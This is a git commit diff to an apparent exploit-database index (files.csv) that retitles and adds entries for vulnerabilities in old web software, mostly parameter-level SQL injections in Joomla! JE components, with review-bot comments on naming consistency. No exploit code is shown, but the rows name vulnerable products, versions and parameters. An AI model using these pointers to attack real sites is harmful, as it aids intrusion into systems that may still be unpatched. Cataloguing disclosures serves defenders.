DB: 2017-02-14
20 new exploits Nokia N95-8 - browser (setAttributeNode) Method Crash Nokia N95-8 browser - 'setAttributeNode' Method Crash Got All Media 7.0.0.3 - (t00t) Remote Denial of Service Got All Media 7.0.0.3 - Remote Denial of Service GeoVision Digital Video Surveillance System - (geohttpserver) DT GeoVision Digital Video Surveillance System 8.2 - Arbitrary File Disclosure pHNews alpha 1 - (templates_dir) Remote Code Execution pHNews alpha 1 - 'templates_dir' Parameter Remote Code Execution Bloggeruniverse 2.0 Beta - 'editcomments.php id' SQL Injection Den Dating 9.01 - 'searchmatch.php' SQL Injection InselPhoto 1.1 - (query) SQL Injection PHP Krazy Image Host Script 1.01 - 'viewer.php id' SQL Injection Bloggeruniverse 2.0 Beta - 'id' Parameter SQL Injection Den Dating 9.01 - 'txtlookgender' Parameter SQL Injection InselPhoto 1.1 - 'query' Parameter SQL Injection PHP Krazy Image Host Script 1.01 - 'id' Parameter SQL Injection Vlinks 1.1.6 - 'id' SQL Injection Vlinks 1.1.6 - 'id' Parameter SQL Injection CmsFaethon 2.2.0 - info.php item SQL Command Injection InselPhoto 1.1 - Persistent Cross-Site Scripting CmsFaethon 2.2.0 - 'item' Parameter SQL Injection InselPhoto 1.1 - Cross-Site Scripting SAS Hotel Management System - 'myhotel_info.asp' SQL Injection YACS CMS 8.11 - update_trailer.php Remote File Inclusion SAS Hotel Management System - 'id' Parameter SQL Injection YACS CMS 8.11 - 'update_trailer.php' Remote File Inclusion pHNews Alpha 1 - 'header.php mod' SQL Injection pHNews Alpha 1 - 'mod' Parameter SQL Injection Novaboard 1.0.1 - (message) Persistent Cross-Site Scripting Novaboard 1.0.1 - Cross-Site Scripting Joomla! Component JE Quiz - Blind SQL Injection Joomla! Component JE Quiz - 'eid' Parameter Blind SQL Injection SAS Hotel Management System - user_login.asp SQL Injection SAS Hotel Management System - 'notfound' Parameter SQL Injection JE Messenger 1.0 - Arbitrary File Upload Joomla! Component JE Messenger 1.0 - Arbitrary File Upload Joomla! 
Component 'com_jeauto' - Local File Inclusion Joomla! Component JE Auto - Local File Inclusion vlinks 2.0.3 - 'site.php id Parameter' SQL Injection Vlinks 2.0.3 - 'id' Parameter SQL Injection Yacs CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Inclusion YACS CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Inclusion Joomla! Component Soccer Bet 4.1.5 - 'userid' Parameter SQL Injection PHP Marketplace Script - SQL Injection Joomla! Component JE Classify Ads 1.2 - 'pro_id' Parameter SQL Injection Joomla! Component JE Gallery 1.3 - 'photo_id' Parameter SQL Injection Joomla! Component JE Directory 1.7 - 'ditemid' Parameter SQL Injection Joomla! Component JE QuoteForm - 'Itemid' Parameter SQL Injection Joomla! Component JE Property Finder 1.6.3 - SQL Injection Joomla! Component JE Tour 2.0 - SQL Injection Joomla! Component JE Video Rate 1.0 - SQL Injection Joomla! Component JE auction 1.6 - 'eid' Parameter SQL Injection Joomla! Component JE Auto 1.5 - 'd_itemid' Parameter SQL Injection Joomla! Component JE Awd Song 1.8 - SQL Injection Joomla! Component Hbooking 1.9.9 - 'h_id' Parameter SQL Injection Joomla! Component JE Quiz 2.3 - SQL Injection Joomla! Component JE Grid Folio - 'id' Parameter SQL Injection Joomla! Component JE K2 Multiple Form Story 1.3 - 'Itemid' Parameter SQL Injection Joomla! Component JE Form Creator 1.8 - 'Itemid' Parameter SQL Injection Joomla! Component JE Portfolio Creator 1.2 - 'd_itemid' Parameter SQL Injection Joomla! Component JE Ticket System 1.2 - SQL Injection Joomla! Component JE Messanger - SQL Injection
This commit is contained in:
parent
8b6bfd7f93
commit
d548da5f4f
21 changed files with 431 additions and 21 deletions
62
files.csv
|
@ -941,10 +941,10 @@ id,file,description,date,author,platform,type,port
|
|||
8013,platforms/hardware/dos/8013.txt,"Nokia N95-8 - '.jpg' Remote Crash (PoC)",2009-02-09,"Juan Yacubian",hardware,dos,0
|
||||
8021,platforms/multiple/dos/8021.pl,"Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service",2009-02-09,"Praveen Darshanam",multiple,dos,0
|
||||
8024,platforms/windows/dos/8024.py,"TightVNC - Authentication Failure Integer Overflow (PoC)",2009-02-09,desi,windows,dos,0
|
||||
8051,platforms/hardware/dos/8051.html,"Nokia N95-8 - browser (setAttributeNode) Method Crash",2009-02-13,"Juan Yacubian",hardware,dos,0
|
||||
8051,platforms/hardware/dos/8051.html,"Nokia N95-8 browser - 'setAttributeNode' Method Crash",2009-02-13,"Juan Yacubian",hardware,dos,0
|
||||
8058,platforms/windows/dos/8058.pl,"TPTEST 3.1.7 - Stack Buffer Overflow (PoC)",2009-02-16,ffwd,windows,dos,0
|
||||
8077,platforms/windows/dos/8077.html,"Microsoft Internet Explorer 7 - Memory Corruption (PoC) (MS09-002)",2009-02-18,anonymous,windows,dos,0
|
||||
8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 - (t00t) Remote Denial of Service",2009-02-20,LiquidWorm,windows,dos,0
|
||||
8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 - Remote Denial of Service",2009-02-20,LiquidWorm,windows,dos,0
|
||||
8090,platforms/windows/dos/8090.txt,"Multiple PDF Readers - JBIG2 Local Buffer Overflow (PoC)",2009-02-23,webDEViL,windows,dos,0
|
||||
8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - (BODY onload) Remote Crash",2009-02-23,Skylined,multiple,dos,0
|
||||
8099,platforms/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow PoC (2)",2009-02-23,"Guido Landi",windows,dos,0
|
||||
|
@ -9923,7 +9923,7 @@ id,file,description,date,author,platform,type,port
|
|||
8022,platforms/hardware/remote/8022.txt,"3Com OfficeConnect Wireless Cable/DSL Router - Authentication Bypass",2009-02-09,ikki,hardware,remote,0
|
||||
8023,platforms/hardware/remote/8023.txt,"ZeroShell 1.0beta11 - Remote Code Execution",2009-02-09,ikki,hardware,remote,0
|
||||
8037,platforms/multiple/remote/8037.txt,"ProFTPd - 'mod_mysql' Authentication Bypass",2009-02-10,gat3way,multiple,remote,0
|
||||
8041,platforms/windows/remote/8041.txt,"GeoVision Digital Video Surveillance System - (geohttpserver) DT",2009-02-11,"Dejan Levaja",windows,remote,0
|
||||
8041,platforms/windows/remote/8041.txt,"GeoVision Digital Video Surveillance System 8.2 - Arbitrary File Disclosure",2009-02-11,"Dejan Levaja",windows,remote,0
|
||||
8059,platforms/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption (PoC)",2009-02-16,Nine:Situations:Group,windows,remote,0
|
||||
8079,platforms/windows/remote/8079.html,"Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)",2009-02-20,Abysssec,windows,remote,0
|
||||
8080,platforms/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002) (Python)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0
|
||||
|
@ -16638,7 +16638,7 @@ id,file,description,date,author,platform,type,port
|
|||
2295,platforms/php/webapps/2295.txt,"In-link 2.3.4 - (ADODB_DIR) Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0
|
||||
2296,platforms/asp/webapps/2296.txt,"SimpleBlog 2.3 - 'id' SQL Injection",2006-09-04,Vipsta/MurderSkillz,asp,webapps,0
|
||||
2297,platforms/php/webapps/2297.pl,"TR Forum 2.0 - SQL Injection / Bypass Security Restriction Exploit",2006-09-04,DarkFig,php,webapps,0
|
||||
2298,platforms/php/webapps/2298.php,"pHNews alpha 1 - (templates_dir) Remote Code Execution",2006-09-04,Kacper,php,webapps,0
|
||||
2298,platforms/php/webapps/2298.php,"pHNews alpha 1 - 'templates_dir' Parameter Remote Code Execution",2006-09-04,Kacper,php,webapps,0
|
||||
2299,platforms/php/webapps/2299.php,"PHP Proxima 6 - completepack Remote Code Execution",2006-09-04,Kacper,php,webapps,0
|
||||
2300,platforms/php/webapps/2300.pl,"SoftBB 0.1 - (cmd) Remote Command Execution",2006-09-04,DarkFig,php,webapps,0
|
||||
2301,platforms/php/webapps/2301.txt,"MySpeach 3.0.2 - (my_ms[root]) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0
|
||||
|
@ -20729,30 +20729,30 @@ id,file,description,date,author,platform,type,port
|
|||
8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Arbitrary File Upload",2009-02-11,ZoRLu,php,webapps,0
|
||||
8040,platforms/php/webapps/8040.txt,"Graugon Gallery 1.0 - Cross-Site Scripting / SQL Injection / Cookie Bypass",2009-02-11,x0r,php,webapps,0
|
||||
8042,platforms/php/webapps/8042.txt,"dacio's CMS 1.08 - Cross-Site Scripting / SQL Injection / File Disclosure",2009-02-11,"Mehmet Ince",php,webapps,0
|
||||
8043,platforms/php/webapps/8043.pl,"Bloggeruniverse 2.0 Beta - 'editcomments.php id' SQL Injection",2009-02-11,Osirys,php,webapps,0
|
||||
8044,platforms/php/webapps/8044.txt,"Den Dating 9.01 - 'searchmatch.php' SQL Injection",2009-02-11,nuclear,php,webapps,0
|
||||
8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 - (query) SQL Injection",2009-02-11,Osirys,php,webapps,0
|
||||
8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - 'viewer.php id' SQL Injection",2009-02-12,x0r,php,webapps,0
|
||||
8043,platforms/php/webapps/8043.pl,"Bloggeruniverse 2.0 Beta - 'id' Parameter SQL Injection",2009-02-11,Osirys,php,webapps,0
|
||||
8044,platforms/php/webapps/8044.txt,"Den Dating 9.01 - 'txtlookgender' Parameter SQL Injection",2009-02-11,nuclear,php,webapps,0
|
||||
8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 - 'query' Parameter SQL Injection",2009-02-11,Osirys,php,webapps,0
|
||||
8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - 'id' Parameter SQL Injection",2009-02-12,x0r,php,webapps,0
|
||||
8047,platforms/php/webapps/8047.txt,"Free Joke Script 1.0 - Authentication Bypass / SQL Injection",2009-02-12,Muhacir,php,webapps,0
|
||||
8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary .ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",asp,webapps,0
|
||||
8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - Local File Inclusion / SQL Injection",2009-02-13,nuclear,php,webapps,0
|
||||
8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' SQL Injection",2009-02-13,JIKO,php,webapps,0
|
||||
8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' Parameter SQL Injection",2009-02-13,JIKO,php,webapps,0
|
||||
8052,platforms/php/webapps/8052.pl,"ea-gBook 0.1 - Remote Command Execution with Remote File Inclusion (c99)",2009-02-13,bd0rk,php,webapps,0
|
||||
8053,platforms/php/webapps/8053.pl,"BlogWrite 0.91 - Remote File Disclosure / SQL Injection",2009-02-13,Osirys,php,webapps,0
|
||||
8054,platforms/php/webapps/8054.pl,"CmsFaethon 2.2.0 - info.php item SQL Command Injection",2009-02-13,Osirys,php,webapps,0
|
||||
8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 - Persistent Cross-Site Scripting",2009-02-16,rAWjAW,php,webapps,0
|
||||
8054,platforms/php/webapps/8054.pl,"CmsFaethon 2.2.0 - 'item' Parameter SQL Injection",2009-02-13,Osirys,php,webapps,0
|
||||
8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 - Cross-Site Scripting",2009-02-16,rAWjAW,php,webapps,0
|
||||
8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 - 'FCKeditor' Arbitrary File Upload",2009-02-16,Sp3shial,php,webapps,0
|
||||
8061,platforms/php/webapps/8061.pl,"simplePms CMS 0.1.4 - Local File Inclusion / Remote Command Execution",2009-02-16,Osirys,php,webapps,0
|
||||
8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b - SQL Injection / Cross-Site Scripting",2009-02-16,brain[pillow],php,webapps,0
|
||||
8063,platforms/php/webapps/8063.txt,"Novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0
|
||||
8064,platforms/php/webapps/8064.pl,"MemHT Portal 4.0.1 - Delete All Private Messages Exploit",2009-02-16,StAkeR,php,webapps,0
|
||||
8065,platforms/asp/webapps/8065.txt,"SAS Hotel Management System - 'myhotel_info.asp' SQL Injection",2009-02-16,Darkb0x,asp,webapps,0
|
||||
8066,platforms/php/webapps/8066.txt,"YACS CMS 8.11 - update_trailer.php Remote File Inclusion",2009-02-16,ahmadbady,php,webapps,0
|
||||
8065,platforms/asp/webapps/8065.txt,"SAS Hotel Management System - 'id' Parameter SQL Injection",2009-02-16,Darkb0x,asp,webapps,0
|
||||
8066,platforms/php/webapps/8066.txt,"YACS CMS 8.11 - 'update_trailer.php' Remote File Inclusion",2009-02-16,ahmadbady,php,webapps,0
|
||||
8068,platforms/php/webapps/8068.txt,"ravennuke 2.3.0 - Multiple Vulnerabilities",2009-02-16,waraxe,php,webapps,0
|
||||
8069,platforms/php/webapps/8069.txt,"Grestul 1.x - Authentication Bypass (Cookie SQL Injection)",2009-02-16,x0r,php,webapps,0
|
||||
8070,platforms/asp/webapps/8070.txt,"SAS Hotel Management System - Arbitrary File Upload",2009-02-17,ZoRLu,asp,webapps,0
|
||||
8071,platforms/php/webapps/8071.txt,"S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete Vulnerabilities",2009-02-17,x0r,php,webapps,0
|
||||
8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 - 'header.php mod' SQL Injection",2009-02-17,x0r,php,webapps,0
|
||||
8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 - 'mod' Parameter SQL Injection",2009-02-17,x0r,php,webapps,0
|
||||
8073,platforms/php/webapps/8073.txt,"pHNews Alpha 1 - 'genbackup.php' Database Disclosure",2009-02-17,x0r,php,webapps,0
|
||||
8075,platforms/php/webapps/8075.pl,"Firepack - 'admin/ref.php' Remote Code Execution",2009-02-18,Lidloses_Auge,php,webapps,0
|
||||
8076,platforms/php/webapps/8076.txt,"smNews 1.0 - Authentication Bypass/Column Truncation Vulnerabilities",2009-02-18,x0r,php,webapps,0
|
||||
|
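Review bot: The 8057 row drops "Persistent" from the InselPhoto 1.1 description ("Persistent Cross-Site Scripting" becomes "Cross-Site Scripting"), which removes the stored-versus-reflected distinction from the index. Other rows in files.csv still carry the qualifier (15781, 20855 and 20856 all read "Persistent Cross-Site Scripting"), so either keep it on 8057 or state in the commit message that the qualifier is being retired everywhere.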
@ -20795,7 +20795,7 @@ id,file,description,date,author,platform,type,port
|
|||
8140,platforms/php/webapps/8140.txt,"Zabbix 1.6.2 Frontend - Multiple Vulnerabilities",2009-03-03,USH,php,webapps,0
|
||||
8141,platforms/php/webapps/8141.txt,"blindblog 1.3.1 - SQL Injection / Authentication Bypass / Local File Inclusion",2009-03-03,"Salvatore Fresta",php,webapps,0
|
||||
8145,platforms/php/webapps/8145.txt,"tghostscripter Amazon Shop - Cross-Site Scripting / Directory Traversal / Remote File Inclusion",2009-03-03,d3b4g,php,webapps,0
|
||||
8150,platforms/php/webapps/8150.txt,"Novaboard 1.0.1 - (message) Persistent Cross-Site Scripting",2009-03-03,Pepelux,php,webapps,0
|
||||
8150,platforms/php/webapps/8150.txt,"Novaboard 1.0.1 - Cross-Site Scripting",2009-03-03,Pepelux,php,webapps,0
|
||||
8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold - (id_news) SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0
|
||||
8161,platforms/php/webapps/8161.txt,"celerbb 0.0.2 - Multiple Vulnerabilities",2009-03-05,"Salvatore Fresta",php,webapps,0
|
||||
8164,platforms/php/webapps/8164.php,"Joomla! Component com_iJoomla_archive - Blind SQL Injection",2009-03-05,Stack,php,webapps,0
|
||||
|
@ -22409,7 +22409,7 @@ id,file,description,date,author,platform,type,port
|
|||
11282,platforms/php/webapps/11282.txt,"Joomla! Component com_ccnewsletter - Local File Inclusion",2010-01-28,AtT4CKxT3rR0r1ST,php,webapps,0
|
||||
11284,platforms/php/webapps/11284.txt,"PHP Product Catalog - Cross-Site Request Forgery (Change Administrator Password)",2010-01-29,bi0,php,webapps,0
|
||||
11286,platforms/php/webapps/11286.txt,"Joomla! Component Jreservation - Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0
|
||||
11287,platforms/php/webapps/11287.txt,"Joomla! Component JE Quiz - Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0
|
||||
11287,platforms/php/webapps/11287.txt,"Joomla! Component JE Quiz - 'eid' Parameter Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0
|
||||
11289,platforms/php/webapps/11289.txt,"Joomla! Component com_dms 2.5.1 - SQL Injection",2010-01-30,kaMtiEz,php,webapps,0
|
||||
11290,platforms/php/webapps/11290.txt,"phpunity.newsmanager - Local File Inclusion",2010-01-30,kaMtiEz,php,webapps,0
|
||||
11292,platforms/php/webapps/11292.txt,"Joomla! Component JE Event Calendar - SQL Injection",2010-01-30,B-HUNT3|2,php,webapps,0
|
||||
|
@ -23511,7 +23511,7 @@ id,file,description,date,author,platform,type,port
|
|||
13867,platforms/php/webapps/13867.txt,"E-Book Store - SQL Injection",2010-06-14,Valentin,php,webapps,0
|
||||
13880,platforms/asp/webapps/13880.txt,"Smart ASP Survey - Cross-Site Scripting / SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
|
||||
13881,platforms/php/webapps/13881.txt,"Pre Job Board Pro - Authentication Bypass",2010-06-15,"L0rd CrusAd3r",php,webapps,0
|
||||
13882,platforms/asp/webapps/13882.txt,"SAS Hotel Management System - user_login.asp SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
|
||||
13882,platforms/asp/webapps/13882.txt,"SAS Hotel Management System - 'notfound' Parameter SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
|
||||
13883,platforms/asp/webapps/13883.txt,"Business Classified Listing - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
|
||||
13884,platforms/asp/webapps/13884.txt,"Restaurant Listing with Online Ordering - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
|
||||
13885,platforms/asp/webapps/13885.txt,"Acuity CMS 2.7.1 - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
|
||||
|
@ -24338,7 +24338,7 @@ id,file,description,date,author,platform,type,port
|
|||
15715,platforms/php/webapps/15715.txt,"CMScout 2.09 - Cross-Site Request Forgery",2010-12-09,"High-Tech Bridge SA",php,webapps,0
|
||||
15720,platforms/php/webapps/15720.txt,"Sulata iSoft - 'stream.php' Local File Disclosure",2010-12-10,Sudden_death,php,webapps,0
|
||||
15718,platforms/php/webapps/15718.txt,"AJ Matrix DNA - SQL Injection",2010-12-09,Br0ly,php,webapps,0
|
||||
15719,platforms/php/webapps/15719.txt,"JE Messenger 1.0 - Arbitrary File Upload",2010-12-09,"Salvatore Fresta",php,webapps,0
|
||||
15719,platforms/php/webapps/15719.txt,"Joomla! Component JE Messenger 1.0 - Arbitrary File Upload",2010-12-09,"Salvatore Fresta",php,webapps,0
|
||||
15721,platforms/php/webapps/15721.txt,"Joomla! Component 'com_billyportfolio' 1.1.2 - Blind SQL Injection",2010-12-10,jdc,php,webapps,0
|
||||
15728,platforms/hardware/webapps/15728.txt,"Clear iSpot/Clearspot 2.0.0.0 - Cross-Site Request Forgery",2010-12-12,"Trustwave's SpiderLabs",hardware,webapps,0
|
||||
15735,platforms/php/webapps/15735.txt,"MantisBT 1.2.3 (db_type) - Cross-Site Scripting / Full Path Disclosure",2010-12-15,LiquidWorm,php,webapps,0
|
||||
|
@ -24366,7 +24366,7 @@ id,file,description,date,author,platform,type,port
|
|||
15775,platforms/php/webapps/15775.txt,"Mafia Game Script - SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0
|
||||
15776,platforms/asp/webapps/15776.pl,"Virtual Store Open 3.0 - Acess SQL Injection",2010-12-18,Br0ly,asp,webapps,0
|
||||
15777,platforms/asp/webapps/15777.txt,"Oto Galery 1.0 - Multiple SQL Injections",2010-12-19,"DeadLy DeMon",asp,webapps,0
|
||||
15779,platforms/php/webapps/15779.txt,"Joomla! Component 'com_jeauto' - Local File Inclusion",2010-12-19,Sid3^effects,php,webapps,0
|
||||
15779,platforms/php/webapps/15779.txt,"Joomla! Component JE Auto - Local File Inclusion",2010-12-19,Sid3^effects,php,webapps,0
|
||||
15781,platforms/php/webapps/15781.txt,"Inout Webmail Script - Persistent Cross-Site Scripting",2010-12-20,Sid3^effects,php,webapps,0
|
||||
15783,platforms/php/webapps/15783.txt,"MaticMarket 2.02 for PHP-Nuke - Local File Inclusion",2010-12-20,xer0x,php,webapps,0
|
||||
15784,platforms/asp/webapps/15784.txt,"Elcom CommunityManager.NET - Authentication Bypass",2010-12-20,"Sense of Security",asp,webapps,0
|
||||
|
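Review bot: The new 15779 description replaces 'com_jeauto' with "JE Auto", so the component identifier that appears in request URLs can no longer be found by searching the index. Row 15721 in the previous hunk keeps 'com_billyportfolio', so the convention is now mixed; suggest keeping the identifier next to the product name, for example "Joomla! Component JE Auto ('com_jeauto') - Local File Inclusion".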
@ -25744,7 +25744,7 @@ id,file,description,date,author,platform,type,port
|
|||
20855,platforms/php/webapps/20855.txt,"Wiki Web Help 0.3.9 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0
|
||||
20856,platforms/php/webapps/20856.txt,"XWiki 4.2-milestone-2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0
|
||||
20857,platforms/php/webapps/20857.txt,"web@all CMS 2.0 - Multiple Vulnerabilities",2012-08-27,LiquidWorm,php,webapps,0
|
||||
20859,platforms/php/webapps/20859.txt,"vlinks 2.0.3 - 'site.php id Parameter' SQL Injection",2012-08-27,JIKO,php,webapps,0
|
||||
20859,platforms/php/webapps/20859.txt,"Vlinks 2.0.3 - 'id' Parameter SQL Injection",2012-08-27,JIKO,php,webapps,0
|
||||
20862,platforms/php/webapps/20862.txt,"WordPress Plugin Count Per Day 3.2.3 - Cross-Site Scripting",2012-08-27,Crim3R,php,webapps,0
|
||||
20863,platforms/php/webapps/20863.txt,"xt:Commerce VEYTON 4.0.15 - (products_name_de) Script Insertion",2012-08-27,LiquidWorm,php,webapps,0
|
||||
20864,platforms/asp/webapps/20864.txt,"Elcom CMS 7.4.10 - Community Manager Insecure Arbitrary File Upload",2012-08-27,"Sense of Security",asp,webapps,0
|
||||
|
@ -33470,7 +33470,7 @@ id,file,description,date,author,platform,type,port
|
|||
34344,platforms/asp/webapps/34344.txt,"Pre Jobo.NET - Multiple SQL Injections",2009-12-17,bi0,asp,webapps,0
|
||||
34345,platforms/java/webapps/34345.txt,"jCore - 'search' Parameter Cross-Site Scripting",2009-12-17,loneferret,java,webapps,0
|
||||
34347,platforms/cgi/webapps/34347.txt,"iOffice 0.1 - 'parametre' Parameter Remote Command Execution",2010-07-18,"Marshall Whittaker",cgi,webapps,0
|
||||
34349,platforms/php/webapps/34349.txt,"Yacs CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Inclusion",2010-07-18,eidelweiss,php,webapps,0
|
||||
34349,platforms/php/webapps/34349.txt,"YACS CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Inclusion",2010-07-18,eidelweiss,php,webapps,0
|
||||
34350,platforms/php/webapps/34350.txt,"Sourcefabric Campsite Articles - HTML Injection",2010-07-15,D4rk357,php,webapps,0
|
||||
34351,platforms/php/webapps/34351.html,"BOLDfx eUploader 3.1.1 - 'admin.php' Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic",php,webapps,0
|
||||
34352,platforms/php/webapps/34352.html,"BOLDfx Recipe Script 5.0 - Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic",php,webapps,0
|
||||
|
@ -37234,6 +37234,7 @@ id,file,description,date,author,platform,type,port
|
|||
41310,platforms/windows/webapps/41310.html,"SonicDICOM PACS 2.3.2 - Cross-Site Request Forgery (Add Admin)",2017-02-11,LiquidWorm,windows,webapps,0
|
||||
41311,platforms/windows/webapps/41311.txt,"SonicDICOM PACS 2.3.2 - Privilege Escalation",2017-02-11,LiquidWorm,windows,webapps,0
|
||||
41312,platforms/linux/webapps/41312.txt,"Kodi 17.1 - Arbitrary File Disclosure",2017-02-12,"Eric Flokstra",linux,webapps,0
|
||||
41328,platforms/php/webapps/41328.txt,"Joomla! Component Soccer Bet 4.1.5 - 'userid' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
|
||||
41313,platforms/php/webapps/41313.txt,"WhizBiz 1.9 - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
|
||||
41314,platforms/php/webapps/41314.txt,"TI Online Examination System 2.0 - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
|
||||
41315,platforms/php/webapps/41315.txt,"Viavi Real Estate - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
|
||||
|
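Review bot: Row 41328 is inserted between 41312 and 41313, out of id order, while the sibling entry for the same component (41327, 'cat' parameter) sits in the next hunk after 41326. The file is not strictly id-sorted elsewhere (15720 precedes 15718), so if this placement is deliberate, the commit message should say which key decides row position; otherwise move 41328 after 41327 so tools that compare the CSV by position or expect ids to increase within a section are not thrown off.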
@ -37247,3 +37248,22 @@ id,file,description,date,author,platform,type,port
|
|||
41325,platforms/php/webapps/41325.txt,"Joomla! Component Sponsor Wall 7.0 - 'wallid' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
|
||||
41326,platforms/php/webapps/41326.txt,"Joomla! Component Vik Booking 1.7 - SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
|
||||
41327,platforms/php/webapps/41327.txt,"Joomla! Component Soccer Bet 4.1.5 - 'cat' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
|
||||
41329,platforms/php/webapps/41329.txt,"PHP Marketplace Script - SQL Injection",2017-02-13,Th3GundY,php,webapps,0
|
||||
41330,platforms/php/webapps/41330.txt,"Joomla! Component JE Classify Ads 1.2 - 'pro_id' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41331,platforms/php/webapps/41331.txt,"Joomla! Component JE Gallery 1.3 - 'photo_id' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41332,platforms/php/webapps/41332.txt,"Joomla! Component JE Directory 1.7 - 'ditemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41333,platforms/php/webapps/41333.txt,"Joomla! Component JE QuoteForm - 'Itemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41334,platforms/php/webapps/41334.txt,"Joomla! Component JE Property Finder 1.6.3 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41335,platforms/php/webapps/41335.txt,"Joomla! Component JE Tour 2.0 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41336,platforms/php/webapps/41336.txt,"Joomla! Component JE Video Rate 1.0 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41337,platforms/php/webapps/41337.txt,"Joomla! Component JE auction 1.6 - 'eid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41338,platforms/php/webapps/41338.txt,"Joomla! Component JE Auto 1.5 - 'd_itemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41339,platforms/php/webapps/41339.txt,"Joomla! Component JE Awd Song 1.8 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41340,platforms/php/webapps/41340.txt,"Joomla! Component Hbooking 1.9.9 - 'h_id' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41341,platforms/php/webapps/41341.txt,"Joomla! Component JE Quiz 2.3 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41342,platforms/php/webapps/41342.txt,"Joomla! Component JE Grid Folio - 'id' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41343,platforms/php/webapps/41343.txt,"Joomla! Component JE K2 Multiple Form Story 1.3 - 'Itemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41344,platforms/php/webapps/41344.txt,"Joomla! Component JE Form Creator 1.8 - 'Itemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41345,platforms/php/webapps/41345.txt,"Joomla! Component JE Portfolio Creator 1.2 - 'd_itemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41346,platforms/php/webapps/41346.txt,"Joomla! Component JE Ticket System 1.2 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41347,platforms/php/webapps/41347.txt,"Joomla! Component JE Messanger - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
|
|
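Review bot: Row 41347 spells the product "JE Messanger", while row 15719, retitled in this same commit, reads "Joomla! Component JE Messenger 1.0". If both rows refer to the same component, a search on either spelling misses the other entry; check the spelling against 41347.txt and the vendor listing, then align the two rows or note the variant in the description.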
|
17
platforms/php/webapps/41328.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
